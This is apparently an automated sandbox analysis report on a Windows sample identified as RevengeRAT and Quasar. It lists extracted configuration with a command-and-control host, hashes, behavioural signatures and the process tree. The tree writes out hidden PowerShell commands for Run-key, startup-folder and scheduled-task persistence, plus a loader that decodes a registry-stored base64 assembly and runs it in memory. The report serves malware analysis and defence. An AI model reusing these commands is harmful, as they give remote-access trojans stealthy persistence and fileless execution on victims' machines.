Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
31-05-2024 15:19
Static task
static1
Behavioral task
behavioral1
Sample
87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe
-
Size
1.4MB
-
MD5
87756bf702699c3df85d5e2f773308ea
-
SHA1
b8797a64796649605e138b45bc5112a07329f1df
-
SHA256
beb2a7c0eaa4c35c9f9a699417c395d78e9e76ffc790c40e7a0987b8044577e0
-
SHA512
f16c78308f8686e2cc28408b5265e710ffbe389161ef5c9df9f454c62f5a88c8ae207e859bd6ffa6b990944911b534c7085f70e9bd30e89ad407262d8a91c293
-
SSDEEP
24576:JAHnh+eWsN3skA4RV1Hom2KXMmHawWv769AZEeFxD3140je8211Wxv14Rf995:Qh+ZkldoPK8Yaw4D1FxRZJgp
Malware Config
Extracted
revengerat
Extracted
quasar
1.4.0.0
Office04
brave.webredirect.org:5467
Xa8hxCQyVS1H1Wdqe8
-
encryption_key
BLgRDyrND0s3i7A4nwYc
-
install_name
Micsoft.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Micsoft
-
subdirectory
Micsoft Updata
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4052-96-0x0000000000400000-0x000000000044E000-memory.dmp family_quasar -
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
RevengeRat Executable 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5136-86-0x00000000077E0000-0x00000000077E8000-memory.dmp revengerat -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 4260 powershell.exe 5304 powershell.exe 184 powershell.exe 5136 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exeWScript.exewscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation 87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_FrameWork.js powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
dllhost.exedllhost.exeMicsoft.exepid process 4892 dllhost.exe 4052 dllhost.exe 1960 Micsoft.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FrameWork = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Microsoft_FrameWork.js" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 64 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
dllhost.exedescription pid process target process PID 4892 set thread context of 4052 4892 dllhost.exe dllhost.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings 87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedllhost.exepid process 4260 powershell.exe 4260 powershell.exe 5304 powershell.exe 5304 powershell.exe 184 powershell.exe 184 powershell.exe 5304 powershell.exe 184 powershell.exe 5136 powershell.exe 5136 powershell.exe 5136 powershell.exe 4892 dllhost.exe 4892 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedllhost.exedllhost.exedescription pid process Token: SeDebugPrivilege 4260 powershell.exe Token: SeDebugPrivilege 5304 powershell.exe Token: SeDebugPrivilege 184 powershell.exe Token: SeDebugPrivilege 5136 powershell.exe Token: SeDebugPrivilege 4892 dllhost.exe Token: SeDebugPrivilege 4052 dllhost.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exeWScript.exepowershell.exewscript.exedllhost.exedllhost.exedescription pid process target process PID 5796 wrote to memory of 4892 5796 87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe dllhost.exe PID 5796 wrote to memory of 4892 5796 87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe dllhost.exe PID 5796 wrote to memory of 4892 5796 87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe dllhost.exe PID 5796 wrote to memory of 1196 5796 87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe WScript.exe PID 5796 wrote to memory of 1196 5796 87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe WScript.exe PID 5796 wrote to memory of 1196 5796 87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe WScript.exe PID 1196 wrote to memory of 4260 1196 WScript.exe powershell.exe PID 1196 wrote to memory of 4260 1196 WScript.exe powershell.exe PID 1196 wrote to memory of 4260 1196 WScript.exe powershell.exe PID 4260 wrote to memory of 5064 4260 powershell.exe wscript.exe PID 4260 wrote to memory of 5064 4260 powershell.exe wscript.exe PID 4260 wrote to memory of 5064 4260 powershell.exe wscript.exe PID 5064 wrote to memory of 5304 5064 wscript.exe powershell.exe PID 5064 wrote to memory of 5304 5064 wscript.exe powershell.exe PID 5064 wrote to memory of 5304 5064 wscript.exe powershell.exe PID 5064 wrote to memory of 184 5064 wscript.exe powershell.exe PID 5064 wrote to memory of 184 5064 wscript.exe powershell.exe PID 5064 wrote to memory of 184 5064 wscript.exe powershell.exe PID 5064 wrote to memory of 5136 5064 wscript.exe powershell.exe PID 5064 wrote to memory of 5136 5064 wscript.exe powershell.exe PID 5064 wrote to memory of 5136 5064 wscript.exe powershell.exe PID 4892 wrote to memory of 4052 4892 dllhost.exe dllhost.exe PID 4892 wrote to memory of 4052 4892 dllhost.exe dllhost.exe PID 4892 wrote to memory of 4052 4892 dllhost.exe dllhost.exe PID 4892 wrote to memory of 4052 4892 dllhost.exe dllhost.exe PID 4892 wrote to memory of 4052 4892 dllhost.exe dllhost.exe PID 4892 wrote to memory of 4052 4892 dllhost.exe dllhost.exe PID 4892 wrote to memory of 4052 4892 dllhost.exe dllhost.exe PID 4892 wrote to memory of 4052 4892 dllhost.exe dllhost.exe PID 4052 wrote to memory of 2148 4052 dllhost.exe schtasks.exe PID 4052 wrote to memory of 2148 4052 dllhost.exe schtasks.exe PID 4052 wrote to memory of 2148 4052 dllhost.exe schtasks.exe PID 4052 wrote to memory of 1960 4052 dllhost.exe Micsoft.exe PID 4052 wrote to memory of 1960 4052 dllhost.exe Micsoft.exe PID 4052 wrote to memory of 1960 4052 dllhost.exe Micsoft.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\87756bf702699c3df85d5e2f773308ea_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5796 -
C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe"C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exeC:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Micsoft" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Z38459586\dllhost.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:2148 -
C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe"C:\Users\Admin\AppData\Roaming\Micsoft Updata\Micsoft.exe"4⤵
- Executes dropped EXE
PID:1960 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Z38459586\Microsoft_FrameWork.js"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('Temp')+'\Microsoft_FrameWork.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\Z38459586\Microsoft_FrameWork.js'));wscript 'C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Windows\SysWOW64\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FrameWork' -value 'C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js' -PropertyType String -Force;"5⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\Microsoft_FrameWork.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Microsoft_FrameWork.js'))"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:184 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'Mircosoft').Mircosoft;$_b=$_b.replace('$','5');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5136
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2JavaScript
1PowerShell
1Scheduled Task/Job
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
418B
MD51439db7996c841101009567fdc3f956a
SHA1746414426c3c0aa5912cd1602951f5a980d09bc8
SHA256e7bbc9d040c7ea8f121033625bb66c3d86823246793833298d3e70bd4327bf6d
SHA512f68a97425091cdcd0fd1d617c3a0d91908b0b39ff9a156fa802598582f3368bd0df624163fc2cbbd0851d88c342c690e9cc1decd80e7023337debb61cf11eea9
-
Filesize
53KB
MD53337d66209faa998d52d781d0ff2d804
SHA16594b85a70f998f79f43cdf1ca56137997534156
SHA2569b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd
SHA5128bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f
-
Filesize
53KB
MD5eec69f1a7eff9b5f29366da620e7de88
SHA1be3b8ae89646aa781dfeb338ecf1b10a8c0c6060
SHA256ffc642634c4337f759852084b94b5bbbb247285d16408d4bec65f240004af5c2
SHA51270d7184fdd97388eb5eeeab2fb716e96a1a4d3a4339e83e98a9b2ca3621c19d379936a108b49d11da971cc428683835f44fc21c59ffb014e3fb5f19c07aa5061
-
Filesize
53KB
MD586a6568d57f478e810b0d93b7981c21f
SHA1b2d7169247eff9219b7b78a8011195e16eb930c6
SHA2564d7898c74896e7abc6ee5516fc6a031d052981cde3187ca17bcf5844dd6292dc
SHA512fa72a88490d155c63a8f6ba983cd23ad1ee0dd6dbfec7035ea51e1bfa0cd85b206cac03751787333bfebbffb50073a77f107d4b4cade7c9a55bb96eb1643c3d0
-
Filesize
276KB
MD5bad746b2c3eb5e28a5427dcb9445a32e
SHA1b5b8bddb70d077c6e4eab1a84194891a794c8e53
SHA2569ca651e13069c71c4a7f2996a37124631d60f97c8452db265ba637407e5d91b3
SHA512b2264c0a06653d0837ca332a0f1171463228a73de481eb52313673046dc55d1197bc3844ea98afae21d4d34c526b1f6e4ed9c3576a10b0c7e3133396c235e282
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
459KB
MD575b65ee1a46049300503dac6643dd0f8
SHA1f66b5f9e8a2a7b67112c9249f835937940c31853
SHA256e8d44052a747d3eb92af3ee59a9cdb98179070acb935dc82b5fee5b9fdacb5de
SHA512c81ec8d673b578456296a7b68a52a1ea707fa3de6cfbf754721e1ebf8c5fac98e3a4718dcf7deafade2bf358494e731db13844e0078cf0ee3662d44794236edb
-
Filesize
505KB
MD5927c3d9494f9c1faa027856471bcc203
SHA16de359b354a8f6abd34336c12445ee2fb6e32339
SHA256397dffec327af9b5b835670f674d7aee11044a018ab7e02347625fde0b3af48f
SHA512be89738dc3ed6fbca0ecbb037bc166002598fc424fd8a13cecc2d2ac5df08887d9a5c2812ca6fc9fe018bfed06ea9d0a9136d047713812342f2612d1a35a62a7